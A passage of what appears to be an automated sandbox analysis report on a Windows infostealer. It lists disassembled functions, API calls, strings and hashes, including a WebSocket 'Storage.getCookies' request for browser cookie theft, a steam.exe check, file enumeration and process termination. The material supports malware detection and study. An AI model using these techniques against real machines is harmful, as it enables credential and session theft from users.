                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                            • String ID: %s\%s$%s\*
                            • API String ID: 4184593125-2848263008
                            • Opcode ID: 8ed5e7bb81e6ecf6144d96ef97b3cfde877abdc570c0d4d99f7d1e6f8eff089d
                            • Instruction ID: 1dcfe8a45cfc09c9a09fea57378ef4817d378c2c5c61c40cfc90b04cf637d9a4
                            • Opcode Fuzzy Hash: 8ed5e7bb81e6ecf6144d96ef97b3cfde877abdc570c0d4d99f7d1e6f8eff089d
                            • Instruction Fuzzy Hash: B5617271910318EBCB21EF74EC89AEE77B9BF58301F0045A5F906A7291DB34AA54CF50
                            Function 0013D720 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0013D73D
                            • FindFirstFileA.KERNEL32(?,?), ref: 0013D754
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 0013D774
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 0013D78E
                            • lstrcat.KERNEL32(?,013FE878), ref: 0013D7D3
                            • lstrcat.KERNEL32(?,013FE8C8), ref: 0013D7E7
                            • lstrcat.KERNEL32(?,?), ref: 0013D7FB
                            • lstrcat.KERNEL32(?,?), ref: 0013D80C
                            • lstrcat.KERNEL32(?,0015179C), ref: 0013D81E
                            • lstrcat.KERNEL32(?,?), ref: 0013D832
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013D872
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013D8C2
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0013D927
                            • FindClose.KERNEL32(00000000), ref: 0013D936
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 50252434-4073750446
                            • Opcode ID: baba38d0b56aa012a74e98602a0eb6cc0be8562483c0f3c810ba0d72adedef33
                            • Instruction ID: bbbcefb05c066c47ea91c06889fcb4ee6fc92d3e57ba4a83c83125b28268a57d
                            • Opcode Fuzzy Hash: baba38d0b56aa012a74e98602a0eb6cc0be8562483c0f3c810ba0d72adedef33
                            • Instruction Fuzzy Hash: F7619571910229EBCF21EF74EC85ADE77B8EF58311F0049A9E649A7250DB34EA54CF90
                            Function 00144AC0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                            • API String ID: 909987262-758292691
                            • Opcode ID: dbd5df41d1463d57b9c158467f1129fad9c88474575c3abf27f1620d39003305
                            • Instruction ID: 5a1c2361e933a1ae23e4cbedec414b70704cf2879dde964945b3829fc340e735
                            • Opcode Fuzzy Hash: dbd5df41d1463d57b9c158467f1129fad9c88474575c3abf27f1620d39003305
                            • Instruction Fuzzy Hash: FCA23671D012699FDB20DFA8C8907EDBBB6BF58300F1481AAE519B7252DB705E85CF90
                            Function 001324F9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00132524
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132547
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00132552
                            • lstrlen.KERNEL32(\*.*), ref: 0013255D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013257A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00132586
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001325BA
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 001325D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: 429d6076be62c0d8e0094ca2aaa5badbae82a4b6fb39eee66b273a6e3380029e
                            • Instruction ID: 47fa581c67502242fd3a1e85d3fe71b0011bde95ce9d6bba394aa16463f36dcc
                            • Opcode Fuzzy Hash: 429d6076be62c0d8e0094ca2aaa5badbae82a4b6fb39eee66b273a6e3380029e
                            • Instruction Fuzzy Hash: 95419231510635EBCB32FF28EC86BDE77B8AF25301F001225F80A97965DB309E158B90
                            Function 001448B0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 001448C9
                            • Process32First.KERNEL32(00000000,00000128), ref: 001448D9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 001448EB
                            • StrCmpCA.SHLWAPI(?,?), ref: 001448FD
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00144912
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00144921
                            • CloseHandle.KERNEL32(00000000), ref: 00144928
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00144936
                            • CloseHandle.KERNEL32(00000000), ref: 00144941
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: 277f85610f5eb72fddc17766c246c76bd8ee26145dca84740d83c747bf04bd1e
                            • Instruction ID: 4720f7b7cb8c150eacdc7868b767b0ab9c21910073e56752f7f5eb5e8bb73cf0
                            • Opcode Fuzzy Hash: 277f85610f5eb72fddc17766c246c76bd8ee26145dca84740d83c747bf04bd1e
                            • Instruction Fuzzy Hash: EC018031601315ABE7225B61EC8DFFB777CEB4CB16F000599F905E21A0EF7499849B61
                            Function 004DA913 Relevance: 12.9, Strings: 9, Instructions: 1631COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $Q5$1+S|$>Yn_$N3z$Vw{$[au?$`3v$aETR$|6
                            • API String ID: 0-729258315
                            • Opcode ID: 74b3f22e2487470f209bb23a0fbfffa2af70a1db0aa7e5e29baf44ab4e6c06d5
                            • Instruction ID: 2e98e5126a06377e73d39fb8c2b0c7f80d58452f8732ea5f1243a3f2501ef531
                            • Opcode Fuzzy Hash: 74b3f22e2487470f209bb23a0fbfffa2af70a1db0aa7e5e29baf44ab4e6c06d5
                            • Instruction Fuzzy Hash: 1DB215F360C2049FE304AF2DEC8567AFBE5EF94320F1A892DE6C583744EA3558458697
                            Function 00144820 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00144838
                            • Process32First.KERNEL32(00000000,00000128), ref: 00144848
                            • Process32Next.KERNEL32(00000000,00000128), ref: 0014485A
                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00144870
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00144882
                            • CloseHandle.KERNEL32(00000000), ref: 0014488D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                            • String ID: steam.exe
                            • API String ID: 2284531361-2826358650
                            • Opcode ID: 79f9dc1c357588748a925507f1a410fcef78adfd629b3b6d7984da83be8226e1
                            • Instruction ID: 3762502931b6a337b827abd5989e227c911d61b4423779e20e9c34b3f6f4e164
                            • Opcode Fuzzy Hash: 79f9dc1c357588748a925507f1a410fcef78adfd629b3b6d7984da83be8226e1
                            • Instruction Fuzzy Hash: 5C0162316013259BE7219BA1AC49FEA77BCEF08752F0401D6F908D20A0EF7499948AA1
                            Function 00134C89 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00134CB1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134CD4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00134CDF
                            • lstrlen.KERNEL32(00154CAC), ref: 00134CEA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134D07
                            • lstrcat.KERNEL32(00000000,00154CAC), ref: 00134D13
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134D3E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00134D5A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID:
                            • API String ID: 2567437900-0
                            • Opcode ID: f27ce56198fdfc13ca6630598147098ec26861bca2a4e9efe0d5bcc1cf3db674
                            • Instruction ID: 74977576bd8bcf751c0959590d388e47285afc6c459acc3a143601a54f5e16df
                            • Opcode Fuzzy Hash: f27ce56198fdfc13ca6630598147098ec26861bca2a4e9efe0d5bcc1cf3db674
                            • Instruction Fuzzy Hash: ED319031521636ABCB32EF64FC86A9E77B9AF65305F001225F81697A65CB30EC518B90
                            Function 004EEA8A Relevance: 11.6, Strings: 8, Instructions: 1614COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 6_{$9F $CTg~$Udv7$pn$rR!$}_R{$I{
                            • API String ID: 0-535894889
                            • Opcode ID: b391ffa2071f9d0fae88fca73c9605c9f35c9545a700502eeb4ff4e921f6f842
                            • Instruction ID: 2257925ca11d6b6c4d42d509cbddecc09b551ed58bf0bdb16bdd5bee3e973a44
                            • Opcode Fuzzy Hash: b391ffa2071f9d0fae88fca73c9605c9f35c9545a700502eeb4ff4e921f6f842
                            • Instruction Fuzzy Hash: 77B228F360C2049FE308AE2DEC8567AFBE5EF94720F164A3DE6C5C3744EA3558418696
                            Function 00142F30 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 001473F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0014740E
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00142F6B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00142F7D
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00142F8A
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00142FBC
                            • LocalFree.KERNEL32(00000000), ref: 0014319A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 46b8913d9f4e12d8c44c6b19d5ee59af1545bddccfc50148cad338030a01fc36
